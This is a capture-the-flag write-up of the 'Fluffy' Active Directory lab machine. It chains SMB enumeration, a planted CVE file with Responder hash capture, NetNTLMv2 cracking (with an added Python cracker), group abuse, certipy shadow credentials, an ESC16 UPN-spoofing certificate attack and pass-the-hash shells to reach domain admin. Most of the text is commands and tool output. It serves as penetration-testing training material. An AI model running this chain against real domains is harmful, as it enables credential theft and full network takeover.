Fluffy
Quickie
User
We are provided access to the user j.fleischman:J0elTHEM4n1990!.
Using netexec, we can quickly enumerate the SMB shares to see where this user can read and write.
netexec smb 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990! --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
The IT share stands out: it is the only one j.fleischman can write to, which makes it both interesting to read and a likely place to plant something. Let's browse it with impacket-smbclient.
impacket-smbclient j.fleischman@10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 .
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 ..
drw-rw-rw- 0 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw- 1827464 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw- 0 Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw- 3225346 Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw- 169963 Sat May 17 22:31:07 2025 Upgrade_Notice.pdf
Upgrade_Notice.pdf points at a particular CVE. Cloning a public PoC for it, dropping the generated file on the writable IT share and running Responder gives us a callback.
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.85]
Responder IPv6 [dead:beef:4::1053]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-I3SM06WIZWL]
Responder Domain Name [ZKM3.LOCAL]
Responder DCE-RPC Port [45843]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:8db68836481e820b...[truncated]
Cracking the captured NetNTLMv2 hash offline (hashcat mode 5600) gives us the user p.agila:prometheusx-303.
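What the offline crack actually computes is worth seeing once. The following is an added example, not code from the write-up or from hashcat: it reimplements the NetNTLMv2 check that `hashcat -m 5600` performs for each candidate password (NT hash = MD4 of the UTF-16LE password, NTLMv2 key = HMAC-MD5 over the upper-cased user plus domain, NTProofStr = HMAC-MD5 over server challenge plus client blob). The capture line it tests against is constructed with a made-up challenge and blob, since the real hash above is truncated; MD4 is implemented inline because hashlib often lacks it under OpenSSL 3.

```python
"""Offline NetNTLMv2 verification, i.e. one iteration of hashcat -m 5600.
Added example; the sample capture below is CONSTRUCTED, not the real hash."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rot(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"          # padding: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rot((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate the working registers
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the value pass-the-hash tools consume."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)).
    Only the user is upper-cased; the domain is used as the client sent it."""
    salt = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), salt, hashlib.md5).digest()


def nt_proof(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTLMv2 hash, server challenge || client blob)."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str) -> dict:
    """Split a Responder / hashcat 5600 line: user::DOMAIN:challenge:NTProofStr:blob."""
    user, _, rest = line.partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_password(line: str, candidate: str) -> bool:
    """Recompute NTProofStr for the candidate and compare: True means cracked."""
    c = parse_capture(line)
    key = ntlmv2_key(candidate, c["user"], c["domain"])
    return hmac.compare_digest(nt_proof(key, c["challenge"], c["blob"]), c["proof"])


def forge_capture(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a capture line for a known password (used here only to construct sample data)."""
    proof = nt_proof(ntlmv2_key(password, user, domain), challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: fixed server challenge and a minimal NTLMv2 blob (type 0x0101,
# zero timestamp, 8-byte client challenge, reserved, empty AV pair list).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" "0000000000000000" "0a0a0a0a0a0a0a0a" "00000000" "00000000")
SAMPLE_LINE = forge_capture("p.agila", "FLUFFY", "prometheusx-303", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    for guess in ("password", "prometheusx-303"):
        print(f"{guess!r}: {check_password(SAMPLE_LINE, guess)}")
```

Because the server challenge is chosen by the attacker's Responder and the proof is keyed only by a password-derived value, every captured exchange can be attacked offline at the cost of one MD4 and two HMAC-MD5 per candidate, which is why a weak password on a relayed or poisoned client is enough.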
As always, use BloodHound to map out possible AD attack paths.

BloodHound shows that p.agila has GenericAll over the Service Accounts group, which lets us do essentially anything to it, including adding our newly obtained p.agila as a member with net rpc:
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc
Membership in Service Accounts in turn gives us GenericWrite over the service accounts themselves. GenericWrite on a user allows either a targeted Kerberoast (write an SPN, request the service ticket, crack it offline) or a shadow credentials attack (write msDS-KeyCredentialLink, then authenticate with PKINIT, which requires the DC to hold a certificate, in practice issued by AD CS). The presence of ca_svc suggests AD CS is deployed, so let's opt for shadow credentials against winrm_svc:
certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip 10.10.11.69 -account 'winrm_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c'
[*] Adding Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ls
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../
*Evil-WinRM* PS C:\Users\winrm_svc> ls
Directory: C:\Users\winrm_svc
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/17/2025 11:56 AM Desktop
d-r--- 5/19/2025 9:15 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\winrm_svc> cd Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/3/2025 10:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
<REDACTED>
Root
winrm_svc has GenericWrite over the users ldap_svc and ca_svc (through the Service Accounts group), so we can run the shadow credentials attack again to retrieve their respective NT hashes.
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ldap_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7'
[*] Adding Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f538f689-fb88-05f3-c323-29489d51470c'
[*] Adding Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
ca_svc is a member of the Cert Publishers group. Querying the CA with certipy (find) as this user shows it is vulnerable to ESC16: the CA omits the szOID_NTDS_CA_SECURITY_EXT (object SID) extension from the certificates it issues, so the DC falls back to mapping certificates to accounts by UPN. Looking at the documentation, we go with Scenario A, since its prerequisite (write access to the victim account's userPrincipalName) is satisfied by the users we already own.

First, we set the UPN of our victim account ca_svc to administrator@fluffy.htb:
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'administrator@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator@fluffy.htb
[*] Successfully updated 'ca_svc'
Next, we request a certificate as the victim account ca_svc (Kerberos auth via -k, with KRB5CCNAME pointing at the ca_svc.ccache written by the shadow credentials step) from a template such as User. The issued certificate's SAN carries the spoofed UPN and, as the output confirms, no object SID:
certipy-ad -debug req -k -dc-host 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: '10.10.11.69'
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.fluffy.htb' at '192.168.125.2'
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/certipy/lib/target.py", line 442, in resolve
answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 1306, in resolve
(request, answer) = resolution.next_request()
~~~~~~~~~~~~~~~~~~~~~~~^^
File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 750, in next_request
raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: DC01.fluffy.htb.
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.fluffy.htb'
[+] Got TGS for 'HOST/DC01.fluffy.htb'
[+] Trying to connect to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[*] Request ID is 17
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Lastly, we revert the UPN before authenticating, so that administrator@fluffy.htb in the certificate resolves to the real Administrator account rather than to ca_svc:
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.69 -username 'administrator' -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@fluffy.htb'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat *
<REDACTED>